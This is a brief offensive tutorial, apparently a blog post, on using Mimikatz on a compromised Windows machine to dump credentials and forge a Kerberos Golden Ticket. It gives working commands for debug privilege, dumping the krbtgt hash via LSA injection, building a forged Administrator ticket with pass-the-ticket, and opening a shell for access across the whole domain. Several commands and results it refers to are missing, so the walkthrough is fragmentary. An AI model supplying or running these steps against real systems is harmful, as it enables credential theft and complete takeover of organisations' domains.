What is Mimikatz?
- Tool used to view and steal credentials, generate Kerberos tickets, and leverage attacks
- Dumps credentials stored in memory.
- Just a few attacks: Credentials Dumping, Pass-the-Hash, Over-Pass-the-Hash, Pass-the-Ticket, Golden Ticket, Silver Ticket.
We will use the tool named as Mimikatz to dump credentials from a computer.
We are assuming that a computer is compromised by us and we are running this tool in that computer using the command prompt.
So firstly we will download this tool from github and we will run this tool on that computer.
Command to start: mimikatz.exe
This command will open a prompt of mimikatz where we can execute commands to dump the credentials.
Our very First command will be:
We are looking for the “Privilege ‘20’ OK”
As we are dumping these credentials from the computer’s memory so,
If we do not turn on the privilege debug then we will not be able to bypass these attacks or the memory protections that are in space.
So the first attack is:
Now we have successfully dumped all the credentials on the domain controller.
GOLDEN TICKET ATTACK
If we have a Golden Ticket then we can get access to the entire domain.
We will use mimikatz.
First Command: privilege::debug
Now we will dump LSA of krbtgt
Command: lsadump::lsa /inject /name:krbtgt
Now we have successfully dumped.
To generate the golden ticket, we need SID, Hash NTLM
Command: kerberos::golden /User:Administrator(not real user) /domain:<domain name> /sid:<SID> /krbtgt:<NTLM hash> /id:500 /ptt
Here id 500 is the RID of Administrator.
ptt stands for Pass The Ticket.
The result will be:
Now we will use the Command: misc::cmd
This will open the cmd where we can utilize the session and the golden ticket.
Now we have access all over the Domain.
Now we have can access any machine on this Domain.